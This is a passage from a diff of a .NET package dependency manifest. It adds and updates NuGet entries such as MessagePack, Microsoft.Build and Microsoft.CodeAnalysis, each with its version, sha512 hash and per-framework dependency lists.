"Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net9.0": ["Microsoft.Build.Framework", 
"Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Security.Permissions"]}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.CodeAnalysis", "id": "Microsoft.CodeAnalysis", "version": "4.9.2", "sha512": "sha512-CJh/yj/ZWnDn0qRDovqeb7qhXl4MDFR5CELAQ2B5K9dcEC6JPg7Fkm2ADRiBM4UF7ub+n6fkiE5+/+GPD5WbFg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], 
"net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net462": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net47": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net471": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net472": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net48": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net5.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net6.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net7.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net8.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "net9.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], 
"netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"], "netstandard2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack", "id": "MessagePack", "version": "2.5.187", "sha512": "sha512-gZ6QLyipngHr+n/XWWm7TM26j9vkM6+B6RXBuv+ia/DjJsG6pJaQbVuz/+RBFJrSd98eTk+CqHwrE1DtFyR1bw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net462": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net47": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net471": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net472": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net48": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Runtime.CompilerServices.Unsafe", "System.Threading.Tasks.Extensions"], "net5.0": ["MessagePack.Annotations", 
"Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net7.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net8.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "net9.0": ["MessagePack.Annotations", "Microsoft.NET.StringTools"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": 
["MessagePack.Annotations", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Threading.Tasks.Extensions", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MessagePack.Annotations", "id": "MessagePack.Annotations", "version": "2.5.187", "sha512": "sha512-1IThHnbMw6Ah9Mb/bZfWEwZDo3ZbsU9usGAOeCs/oPWsklrdxVDNZHjIg6myvjlQvL7oMhagEeb+07kjL410aQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Bcl.AsyncInterfaces", "id": "Microsoft.Bcl.AsyncInterfaces", "version": "8.0.0", "sha512": "sha512-ecsHc9lEZZJM7k5HHZA1PV2N+ELEarLFcssV2bn7XQIJoaiNZDkplTNcX+VKANfDGURAuEyVFCcRu7aFy16VUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Threading.Tasks.Extensions"], "net462": ["System.Threading.Tasks.Extensions"], "net47": ["System.Threading.Tasks.Extensions"], "net471": ["System.Threading.Tasks.Extensions"], "net472": ["System.Threading.Tasks.Extensions"], "net48": ["System.Threading.Tasks.Extensions"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], 
"net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["System.Threading.Tasks.Extensions"], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Threading.Tasks.Extensions"], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build", "id": "Microsoft.Build", "version": "17.12.6", "sha512": "sha512-YEiL5xKowbwnr52YroALNHg8YurjLyFTlhv3USrswhubuxN2ldY1TmQpBKQ4K28UgWJV9BxTVXY9/CecMNDeOA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Memory", "System.Reflection.MetadataLoadContext", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe"], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Configuration.ConfigurationManager", "System.Reflection.MetadataLoadContext", "System.Collections.Immutable", "System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], 
"netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build.Framework", "id": "Microsoft.Build.Framework", "version": "17.12.6", "sha512": "sha512-UjfxnrQN9BPVtO0Kvv2FB5dpN2CX5snc7coq5vVQdbCV6kdSpI/r+GZTLvU/5BTT8y8bvIUqoocxRR674N6bWg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": 
["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.Build.Utilities.Core", "id": "Microsoft.Build.Utilities.Core", "version": "17.5.0", "sha512": "sha512-La1NFQ7SVz1pVGEUnG15BQG26jJkRMCiitySBXLhuTYf9IG6eZ5j5UFjnM4EFKSVKbictRv+D/F0dQtsCiK9ag==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net462": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net47": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net471": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net472": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net48": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], 
"net7.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.NET.StringTools", "System.Collections.Immutable", "System.Configuration.ConfigurationManager", "System.Text.Encoding.CodePages"]}, 
"targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.CodeAnalysis", "id": "Microsoft.CodeAnalysis", "version": "4.12.0", "sha512": "sha512-saGSG86irNb5MX0/7j0Lx2T0jSGQuqa6QlohBHBcTzObPyMunQZIuIWVXlEiKwcrcEQm4rtUg/5FW43s0dqH7Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net462": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net47": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net471": 
["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net472": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net48": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net5.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", 
"System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net8.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net9.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", 
"System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", 
"System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.CSharp.Workspaces", "Microsoft.CodeAnalysis.VisualBasic.Workspaces", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.CodeAnalysis.Analyzers", "id": 
